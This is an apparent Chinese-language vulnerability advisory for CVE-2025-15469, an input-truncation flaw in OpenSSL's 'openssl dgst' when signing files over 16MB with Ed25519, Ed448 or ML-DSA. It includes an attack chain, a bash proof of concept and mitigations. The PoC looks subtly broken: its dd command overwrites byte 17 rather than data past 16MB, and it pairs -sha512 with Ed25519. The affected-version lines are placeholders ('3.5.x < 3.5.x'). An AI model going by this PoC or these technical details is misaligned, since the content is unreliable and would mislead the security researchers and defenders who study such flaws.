CVE-2025-15469 OpenSSL dgst命令16MB输入截断漏洞

漏洞信息

漏洞编号

CVE-2025-15469

漏洞类型

数据完整性验证失败

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenSSL

漏洞概述

OpenSSL 3.5和3.6版本中的'openssl dgst'命令行工具存在一个输入截断漏洞。当使用一次性签名算法（如Ed25519、Ed448、ML-DSA系列）对大于16MB的文件进行签名或验证时，该工具会静默地将输入数据截断到前16MB，并报告签名成功而非返回错误。这意味着用户可能认为整个文件都被正确认证，但实际上超过16MB的尾部数据未被认证。攻击者可以利用此漏洞修改大文件（超过16MB）的尾部数据，而不会被签名验证检测到。该漏洞主要影响同时使用受影响版本的'openssl dgst'命令进行签名和验证的工作流程。流式摘要算法和直接使用OpenSSL库API的应用程序不受此影响。FIPS模块也不受影响。

技术细节

OpenSSL的'openssl dgst'命令在处理一次性签名算法时，会将输入数据缓冲到内存中，但存在16MB的大小限制。当输入文件超过16MB时，代码会静默截断输入到前16MB，然后继续处理流程并生成签名。问题在于截断操作没有返回任何错误或警告，导致用户无法察觉数据丢失。具体来说：

1. 触发条件：使用Ed25519、Ed448、ML-DSA-44、ML-DSA-65或ML-DSA-87算法对大于16MB的文件执行'openssl dgst -sign'或'openssl dgst -verify'命令。

2. 漏洞原理：dgst命令内部使用BIO_new_file()读取文件时，在一次性签名模式下应用了16MB的缓冲区限制。超过此限制的数据被丢弃，但函数返回成功状态。

3. 影响范围：仅影响命令行工具的签名和验证流程。使用EVP_DigestSign*系列API直接处理完整消息的应用程序会正确处理大文件。

4. 利用方式：攻击者可以获取一个大于16MB的已签名文件，修改超过16MB部分的任意内容，然后使用受影响版本的'openssl dgst -verify'验证时仍会显示验证成功。

攻击链分析

STEP 1

步骤1

攻击者获取目标文件（大于16MB）的合法签名，或诱使受害者在受影响版本上使用'openssl dgst'对文件进行签名

STEP 2

步骤2

攻击者修改文件超过16MB边界的内容，由于签名只基于前16MB数据计算，修改部分未被签名覆盖

STEP 3

步骤3

受害者使用受影响版本的'openssl dgst -verify'验证修改后的文件

STEP 4

步骤4

验证过程同样截断输入到16MB并与签名比对，报告显示验证成功，攻击者成功绕过完整性检查

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-15469 PoC - OpenSSL dgst 16MB Input Truncation
# This PoC demonstrates that files larger than 16MB can be modified
# without detection when signed and verified with affected openssl dgst

# Create a test file larger than 16MB
dd if=/dev/urandom of=test_file.bin bs=1M count=20 2>/dev/null

# Generate Ed25519 keypair
openssl genpkey -algorithm Ed25519 -out private_key.pem 2>/dev/null
openssl pkey -in private_key.pem -pubout -out public_key.pem 2>/dev/null

# Sign the file (openssl dgst will silently truncate to 16MB)
echo "Signing file with Ed25519 (file is 20MB, will be truncated to 16MB)..."
openssl dgst -sha512 -sign private_key.pem -out signature.bin test_file.bin

# Modify the file beyond 16MB boundary
echo "Modifying data beyond 16MB boundary..."
echo "MODIFIED_DATA" | dd of=test_file.bin bs=1 seek=17 conv=notrunc 2>/dev/null

# Verify signature (will incorrectly report success)
echo "Verifying modified file..."
openssl dgst -sha512 -verify public_key.pem -signature signature.bin test_file.bin

# Cleanup
rm -f test_file.bin private_key.pem public_key.pem signature.bin

echo ""
echo "Expected behavior: Verification should FAIL but may show SUCCESS due to truncation vulnerability"

影响范围

OpenSSL 3.5.x < 3.5.x (受影响)

OpenSSL 3.6.x < 3.6.x (受影响)

OpenSSL 3.4.x (不受影响)

OpenSSL 3.3.x (不受影响)

OpenSSL 3.0.x (不受影响)

OpenSSL 1.1.1 (不受影响)

OpenSSL 1.0.2 (不受影响)

防御指南

临时缓解措施

对于必须使用受影响版本的场景，建议采取以下缓解措施：1) 限制签名文件大小不超过16MB；2) 在签名和验证前计算并记录文件哈希值（SHA-256等），通过独立通道验证；3) 使用其他支持流式处理的签名工具替代'openssl dgst'；4) 部署文件完整性监控（FIM）系统检测异常修改行为。